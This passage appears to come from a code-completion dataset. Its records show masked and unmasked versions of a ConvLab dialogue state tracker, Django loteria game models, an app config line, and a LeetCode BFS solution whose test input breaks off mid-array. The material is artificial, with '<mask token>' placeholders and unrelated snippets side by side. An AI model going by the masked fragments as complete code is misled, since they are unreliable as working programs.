v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n <mask token>\n", "step-2": "<mask token>\n\n\nclass RuleDST(Tracker):\n <mask token>\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] 
= nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n", "step-3": "<mask token>\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n", "step-4": "import copy\nimport json\nimport os\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom 
convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix +\n '/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n if not isinstance(user_act, dict):\n raise Exception(\n \"Expect user_act to be <class 'dict'> type but get {}.\".\n format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception(\n 'Error: domain <{}> not in new belief state'.\n format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(\n self.value_dict, domain, k, v)\n else:\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'\n .format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n self.state = new_state\n return self.state\n\n def init_session(self):\n self.state = init_state()\n", "step-5": "# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT license.\n\nimport copy\nimport json\nimport os\n\nimport convlab\nfrom convlab.modules.dst.multiwoz.dst_util import init_state\nfrom convlab.modules.dst.multiwoz.dst_util import normalize_value\nfrom convlab.modules.dst.state_tracker import Tracker\nfrom convlab.modules.util.multiwoz.multiwoz_slot_trans import REF_SYS_DA\n\n\nclass RuleDST(Tracker):\n \"\"\"Rule based DST which trivially updates new values from NLU result to states.\"\"\"\n def __init__(self):\n Tracker.__init__(self)\n self.state = init_state()\n prefix = os.path.dirname(os.path.dirname(convlab.__file__))\n self.value_dict = json.load(open(prefix+'/data/multiwoz/value_dict.json'))\n\n def update(self, user_act=None):\n # print('------------------{}'.format(user_act))\n if not isinstance(user_act, dict):\n raise Exception('Expect user_act to be <class \\'dict\\'> type but get {}.'.format(type(user_act)))\n previous_state = self.state\n new_belief_state = copy.deepcopy(previous_state['belief_state'])\n new_request_state = copy.deepcopy(previous_state['request_state'])\n for domain_type in user_act.keys():\n domain, tpe = 
domain_type.lower().split('-')\n if domain in ['unk', 'general', 'booking']:\n continue\n if tpe == 'inform':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if k is None:\n continue\n try:\n assert domain in new_belief_state\n except:\n raise Exception('Error: domain <{}> not in new belief state'.format(domain))\n domain_dic = new_belief_state[domain]\n assert 'semi' in domain_dic\n assert 'book' in domain_dic\n\n if k in domain_dic['semi']:\n nvalue = normalize_value(self.value_dict, domain, k, v)\n # if nvalue != v:\n # _log('domain {} slot {} value {} -> {}'.format(domain, k, v, nvalue))\n new_belief_state[domain]['semi'][k] = nvalue\n elif k in domain_dic['book']:\n new_belief_state[domain]['book'][k] = v\n elif k.lower() in domain_dic['book']:\n new_belief_state[domain]['book'][k.lower()] = v\n elif k == 'trainID' and domain == 'train':\n new_belief_state[domain]['book'][k] = normalize_value(self.value_dict, domain, k, v)\n else:\n # raise Exception('unknown slot name <{}> of domain <{}>'.format(k, domain))\n with open('unknown_slot.log', 'a+') as f:\n f.write('unknown slot name <{}> of domain <{}>\\n'.format(k, domain))\n elif tpe == 'request':\n for k, v in user_act[domain_type]:\n k = REF_SYS_DA[domain.capitalize()].get(k, k)\n if domain not in new_request_state:\n new_request_state[domain] = {}\n if k not in new_request_state[domain]:\n new_request_state[domain][k] = 0\n\n new_state = copy.deepcopy(previous_state)\n new_state['belief_state'] = new_belief_state\n new_state['request_state'] = new_request_state\n new_state['user_action'] = user_act\n\n self.state = new_state\n \n return self.state\n\n def init_session(self):\n self.state = init_state()", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
from enum import unique
from django.db import models

import secrets
import string

CARD_PACK_CHOICES = (
    ('1', 'Traditional Cards'),
    ('2', 'Special Cards'),
    ('3', 'Other Themed Cards')
)

MARKER_CHOICES = (
    ('1', 'Plastic Dots'),
    ('2', 'Quarters'),
    ('3', 'Beans')
)

def generate_game_code() -> int:
    """ Generates a unique game code.

    Returns
    -------
    int
        - a unique 7 digit numerical code
    """
    while True:
        # code will only contain digits
        code_options = string.digits
        generated_game_code = ''.join(secrets.choice(code_options) for i in range(7))
        if Game.objects.filter(game_code=generated_game_code).count() == 0:
            break
    return int(generated_game_code)

def generate_player_id() -> string:
    """Generates a unique player id.

    Returns
    -------
    string
        - a unique 5 digit alphaneumeric code
    """
    while True:
        # code will have uppercase letters and numbers
        code_options = string.ascii_uppercase + string.digits
        generated_player_id = ''.join(secrets.choice(code_options) for i in range(5))
        if Player.objects.filter(player_id=generated_player_id).count() == 0:
            break
    return generated_player_id

# Create your models here.
class Game( models.Model):
    """ Model that describes a loteria game

    Fields
    ------
    cards_id : int
        - the id of the card theme chosen by user during creation of game.

    created_at : dateTime
        - the time that the game was started.

    game_code : int
        - a unique 7 digit code assigned during creation
          needed to join games.

    host : string
        - the session key of the person who started the game
          ensures that users do not have more that 1 running game.

    game_over : bool
        - defaults to True for now but will default to False upon creation.

    maker_id : int
        - the id of the marker type chosen by user during creation of game.

    Notes
    -----
    - Considering making game_code primary key instead
    """
    # default 0 will just be regular loteria cards
    # TODO cards_id and marker_id should be choices not harded coded values
    game_code = models.IntegerField(null=False, default=generate_game_code, unique=True)
    created_at = models.DateTimeField(auto_now_add=True)
    host = models.CharField(max_length=100, unique=True)
    cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES, default='1')
    marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES, default='1')
    game_over = models.BooleanField(default=True)


class Player(models.Model):
    """ Model that describes a Player in the Game

    Attributes
    ----------

    name : string
        the display name of the player.
    wins : int
        the number of times this player has won.
    losses : int
        the number of times this player has lost.
    player_id : string
        the id assigned to a player during a game.
    game_code : int
        the game code of the game joined, will be null if no game has been joined.
    """
    player_id = models.CharField(max_length=15, default=generate_player_id, unique=True)
    name = models.CharField(max_length=100, unique=False)
    game_code = models.IntegerField(null=False, unique=False)
    wins = models.IntegerField(null=False, default=0)
    losses = models.IntegerField(null=False, default=0)
    host_key = models.CharField(max_length=100, unique=True)
normal
{ "blob_id": "2fd33439d4403ec72f890a1d1b4f35f2b38d033b", "index": 9268, "step-1": "<mask token>\n\n\nclass Game(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-2": "<mask token>\n\n\ndef generate_game_code() ->int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in\n range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return int(generated_game_code)\n\n\n<mask token>\n\n\nclass Game(models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n game_code = models.IntegerField(null=False, default=generate_game_code,\n unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES,\n default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES,\n default='1')\n game_over = models.BooleanField(default=True)\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-3": "<mask token>\nCARD_PACK_CHOICES = ('1', 'Traditional Cards'), ('2', 'Special 
Cards'), ('3',\n 'Other Themed Cards')\nMARKER_CHOICES = ('1', 'Plastic Dots'), ('2', 'Quarters'), ('3', 'Beans')\n\n\ndef generate_game_code() ->int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in\n range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return int(generated_game_code)\n\n\ndef generate_player_id() ->string:\n \"\"\"Generates a unique player id.\n \n Returns\n -------\n string\n - a unique 5 digit alphaneumeric code\n \"\"\"\n while True:\n code_options = string.ascii_uppercase + string.digits\n generated_player_id = ''.join(secrets.choice(code_options) for i in\n range(5))\n if Player.objects.filter(player_id=generated_player_id).count() == 0:\n break\n return generated_player_id\n\n\nclass Game(models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n game_code = models.IntegerField(null=False, default=generate_game_code,\n unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES,\n default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES,\n default='1')\n game_over = models.BooleanField(default=True)\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-4": "from enum import unique\nfrom django.db import models\nimport secrets\nimport string\nCARD_PACK_CHOICES = ('1', 'Traditional Cards'), ('2', 'Special Cards'), ('3',\n 'Other Themed Cards')\nMARKER_CHOICES = ('1', 'Plastic Dots'), ('2', 'Quarters'), ('3', 'Beans')\n\n\ndef generate_game_code() ->int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in\n range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return 
int(generated_game_code)\n\n\ndef generate_player_id() ->string:\n \"\"\"Generates a unique player id.\n \n Returns\n -------\n string\n - a unique 5 digit alphaneumeric code\n \"\"\"\n while True:\n code_options = string.ascii_uppercase + string.digits\n generated_player_id = ''.join(secrets.choice(code_options) for i in\n range(5))\n if Player.objects.filter(player_id=generated_player_id).count() == 0:\n break\n return generated_player_id\n\n\nclass Game(models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n game_code = models.IntegerField(null=False, default=generate_game_code,\n unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES,\n default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES,\n default='1')\n game_over = models.BooleanField(default=True)\n\n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id,\n unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n", "step-5": "from enum import unique\nfrom django.db import models\n\nimport secrets\nimport string\n\nCARD_PACK_CHOICES = (\n ('1', 'Traditional Cards'),\n ('2', 'Special Cards'),\n ('3', 'Other Themed Cards')\n)\n\nMARKER_CHOICES = (\n ('1', 'Plastic Dots'),\n ('2', 'Quarters'),\n ('3', 'Beans')\n)\n\ndef generate_game_code() -> int:\n \"\"\" Generates a unique game code.\n \n Returns\n -------\n int\n - a unique 7 digit numerical code\n \"\"\"\n while True:\n # code will only contain digits\n code_options = string.digits\n generated_game_code = ''.join(secrets.choice(code_options) for i in range(7))\n if Game.objects.filter(game_code=generated_game_code).count() == 0:\n break\n return int(generated_game_code)\n\ndef generate_player_id() -> string:\n \"\"\"Generates a unique player id.\n \n Returns\n -------\n string\n - a unique 5 digit alphaneumeric code\n \"\"\"\n while True:\n # code will have uppercase letters and numbers\n code_options = string.ascii_uppercase + string.digits\n generated_player_id = ''.join(secrets.choice(code_options) for i in range(5))\n if 
Player.objects.filter(player_id=generated_player_id).count() == 0:\n break\n return generated_player_id\n\n# Create your models here.\nclass Game( models.Model):\n \"\"\" Model that describes a loteria game\n\n Fields\n ------\n cards_id : int\n - the id of the card theme chosen by user during creation of game.\n\n created_at : dateTime\n - the time that the game was started.\n\n game_code : int\n - a unique 7 digit code assigned during creation \n needed to join games.\n\n host : string\n - the session key of the person who started the game\n ensures that users do not have more that 1 running game.\n\n game_over : bool\n - defaults to True for now but will default to False upon creation.\n\n maker_id : int\n - the id of the marker type chosen by user during creation of game.\n\n Notes\n -----\n - Considering making game_code primary key instead\n \"\"\"\n # default 0 will just be regular loteria cards\n # TODO cards_id and marker_id should be choices not harded coded values\n game_code = models.IntegerField(null=False, default=generate_game_code, unique=True)\n created_at = models.DateTimeField(auto_now_add=True)\n host = models.CharField(max_length=100, unique=True)\n cards_id = models.CharField(max_length=10, choices=CARD_PACK_CHOICES, default='1')\n marker_id = models.CharField(max_length=10, choices=MARKER_CHOICES, default='1')\n game_over = models.BooleanField(default=True)\n \n\nclass Player(models.Model):\n \"\"\" Model that describes a Player in the Game\n\n Attributes\n ----------\n\n name : string\n the display name of the player.\n wins : int\n the number of times this player has won.\n losses : int\n the number of times this player has lost.\n player_id : string\n the id assigned to a player during a game.\n game_code : int\n the game code of the game joined, will be null if no game has been joined.\n \"\"\"\n player_id = models.CharField(max_length=15, default=generate_player_id, unique=True)\n name = models.CharField(max_length=100, unique=False)\n game_code = models.IntegerField(null=False, unique=False)\n wins = models.IntegerField(null=False, default=0)\n losses = models.IntegerField(null=False, default=0)\n host_key = models.CharField(max_length=100, unique=True)\n\n\n ", "step-ids": [ 4, 7, 9, 10, 11 ] }
[ 4, 7, 9, 10, 11 ]
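Both generator functions in the models above use the same retry-until-unique pattern: draw a random code with `secrets`, query for a collision, and loop until the draw is fresh. A minimal standalone sketch of that pattern follows; the in-memory `existing` set and the `new_code` helper are illustrative stand-ins for the Django `objects.filter(...).count() == 0` checks and are not part of the original models:

import secrets
import string

existing = set()  # stand-in for the database uniqueness query

def new_code(length=7, alphabet=string.digits):
    # keep drawing until the generated code has not been seen before
    while True:
        code = ''.join(secrets.choice(alphabet) for _ in range(length))
        if code not in existing:
            existing.add(code)
            return code

print(new_code())                                            # e.g. '4829103'
print(new_code(5, string.ascii_uppercase + string.digits))   # e.g. 'K3Q9Z'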
default_app_config = 'child.apps.ChildConfig'
normal
{ "blob_id": "290f96bb210a21183fe1e0e53219ad38ba889625", "index": 1602, "step-1": "<mask token>\n", "step-2": "default_app_config = 'child.apps.ChildConfig'\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
'''
-Medium-
*BFS*

You are given a 0-indexed integer array nums containing distinct numbers, an integer start,
and an integer goal. There is an integer x that is initially set to start, and you want to
perform operations on x such that it is converted to goal. You can perform the following
operation repeatedly on the number x:

If 0 <= x <= 1000, then for any index i in the array (0 <= i < nums.length), you can set x
to any of the following:

x + nums[i]
x - nums[i]
x ^ nums[i] (bitwise-XOR)

Note that you can use each nums[i] any number of times in any order. Operations that set x
to be out of the range 0 <= x <= 1000 are valid, but no more operations can be done afterward.

Return the minimum number of operations needed to convert x = start into goal, and -1 if it
is not possible.

Example 1:
Input: nums = [2,4,12], start = 2, goal = 12
Output: 2
Explanation: We can go from 2 → 14 → 12 with the following 2 operations.
- 2 + 12 = 14
- 14 - 2 = 12

Example 2:
Input: nums = [3,5,7], start = 0, goal = -4
Output: 2
Explanation: We can go from 0 → 3 → -4 with the following 2 operations.
- 0 + 3 = 3
- 3 - 7 = -4
Note that the last operation sets x out of the range 0 <= x <= 1000, which is valid.

Example 3:
Input: nums = [2,8,16], start = 0, goal = 1
Output: -1
Explanation: There is no way to convert 0 into 1.

Constraints:

1 <= nums.length <= 1000
-10^9 <= nums[i], goal <= 10^9
0 <= start <= 1000
start != goal
All the integers in nums are distinct.
'''
from typing import List
from collections import deque

class Solution:
    def minimumOperations(self, nums: List[int], start: int, goal: int) -> int:
        que = deque([(start,0)])
        visited = set()
        while que:
            x, steps = que.popleft()
            for i in nums:
                for t in [x+i, x-i, x^i]:
                    if t == goal:
                        return steps + 1
                    if 0 <= t <= 1000 and t not in visited:
                        visited.add(t)
                        que.append((t, steps+1))
        return -1

if __name__ == "__main__":
    print(Solution().minimumOperations(nums = [2,4,12], start = 2, goal = 12))
    print(Solution().minimumOperations(nums = [3,5,7], start = 0, goal = -4))
    print(Solution().minimumOperations(nums = [2,8,16], start = 0, goal = 1))
    nums = 
[-574083075,-393928592,-508025046,942818778,355796909,515245901,40297943,106087952,112856312,-516143616,363801856,431681353,726373078,947630603,357311001,594181298,-797268217,-741740009,310972287,588107527,-535699426,56324906,-77958073,739798122,-839472160,439902753,-599749231,-378067373,-466272504,-668036170,404827976,805486978,-762507067,726001618,-761047930,574054980,365793614,112020312,612806855,-256862366,174046424,646109365,263765015,952305939,864217737,-236873371,-991807014,365730786,-908194963,-778205177,-949314048,-636570500,-883257881,316313456,-846577965,132287864,-143230736,425542510,-99852882,-845180792,-329895545,402782707,-52191127,-470380017,-788836785,-655887976,-899430590,481923982,45348738,-595401481,-470990760,-417390352,-570278840,-873871723,-905595403,276201114,-733014032,126018863,452235438,-512574658,-172220362,845468743,-743189114,597319839,-584451932,410604481,-508885990,-670396751,-765996786,345814977,-920014372,-826696704,640912714,119494504,745808962,-503060001,-677959595,-831428592,282855843,150678167,-467803553,-503929808,636431692,-235369757,-964826080,93942566,-65314422,-385277528,-379647659,601981747,-724269861,-516713072,-487487495,655771565,406499531,-943540581,-290169291,438686645,-227355533,-822612523,218329747,-800810927,-944724740,-978181517,274815523,296317841,56043572,-712672386,-374759873,86973233,-246165119,73819230,-801140338,414767806,883318746,-822063159,-705772942,-674915800,710520717,-97115365,599549847,115344568,53002314,242487774,-665998906,-986068895,-844909606,-515222297,-500827406,317865850,-50395059,522417393,51184184,241544846,-996297136,-227251827,924359619,822815774,149467545,523511343,252991991,450254984,-393459583,617410075,197030479,-234418418,-256650708,872334551,779068346,216294504,-708680875,-171498970,-970211466,-176493993,729939373,-658054782,-342680218,75508900,-377139149,392008859,121412250,-163586626,-468148273,624248706,50004864,-862378428,-849927586,33598413,-157654824,-229712613,149116317,183820138,378717707,-995563605,777654910,511275580,-157964872,-718605034,-764316227,-225837302,-166208500,-587688677,78982205,-488693575,667205793,419165994,731543316,97551954,-387317666,-580873271,533504431,-31624036,-356035140,-849089082,-767376392,-625237600,940717947,-337709497,915255567,727274007,-879463448,-363148174,-854892492,110472344,-466194659,-146843198,-454944217,-365338018,-349424052,994474446,-554968068,-883734951,-697723265,583756420,-5696410,-413731452,-278706136,-399245668,83345207,-227231270,618384545,846514423,-556667092,590460194,-686116067,-509669269,-510065093,77094171,270317951,166095128,-918526061,-766370855,-20861321,478791777,663673443,-152055285,224745414,123998803,66824877,-85117337,212126175,-718523523,615359230,-212148589,620733736,-81197397,51814471,709312024,562145805,-770811828,321230393,-611636320,-421337549,-804527290,-416739656,-886764000,170695026,414273830,-449987380,-56782953,772039002,-961265403,-896009751,-524231358,497253209,-507048459,-308522246,-508249054,-53240581,-241704483,-974133571,232897679,-152365934,-861310248,-305766289,340680726,844612779,-180227470,40798478,729446447,395975250,-142447074,-606021375,47555730,294446347,452346091,-409427076,-845574381,-838995437,45787728,714700474,-315824001,694717388,502723269,119244099,-538412679,-207297135,-189078560,-812610469,-350061253,-73975237,-119323509,791863263,741180208,740488891,-475394166,-191585617,-441527154,767292531,201222965,-150196525,588513813,245328283,396662663,100705864,126789247,487161165,-460512081,-469521559,-998848254,-917
609155,314537168,418002454,-926920818,-628671538,179971032,-105401559,449618919,823404672,178494651,-773108884,10686795,-506642993,-60172121,-510142552,651623281,-163851428,158562600,-782456228,-336697076,-571952851,849878818,-456510759,-65997243,-506043404,-558981572,186946604,124948039,954065944,707437320,-224056616,-319237038,512138196,742466011,-49725596,-784781640,-753413026,-331602365,-246166733,-658650959,-4888181,-547553549,786689548,-866846384,-212028209,-98029403,-325422497,-409855095,320083382,-491251215,-471713326,890922019,-766590943,-481641953,-227197451,-709166930,-965945544,407688175,-78385698,-372800469,389036825,79885300,-858488452,-390177477,233839191,-518116358,420408256,872470025,241770824,-106901417,-328631191,548580365,-88408815,-647601013,658880218,-870455388,277154380,370022702,-381519264,-800726224,183685380,208169777,925905330,732494840,251754641,-681988029,593628349,153852085,353590607,242118102,-788094641,-242801844,474214244,579450364,580046580,-269927114,249739292,295331955,-544556236,-814569172,808895922,707421114,305101587,621173158,-248896453,988552702,-375313331,-87289858,-796466539,-529411285,-197315984,33984203,-122839651,-90735568,277265491,762059774,-628018119,-406508643,-856856769,364613737,59319066,614382155,-614620718,-133957131,-394985422,-29943491,154443077,-72727846,392096990,562681453,364248049,-156700958,717335155,-343408748,77301840,-155372684,-432114609,414752267,-485732822,876096548,842614035,-614245110,-872219121,291509502,334817026,214330487,405297459,-449582485,789314834,936409758,452350380,-146649749,898255045,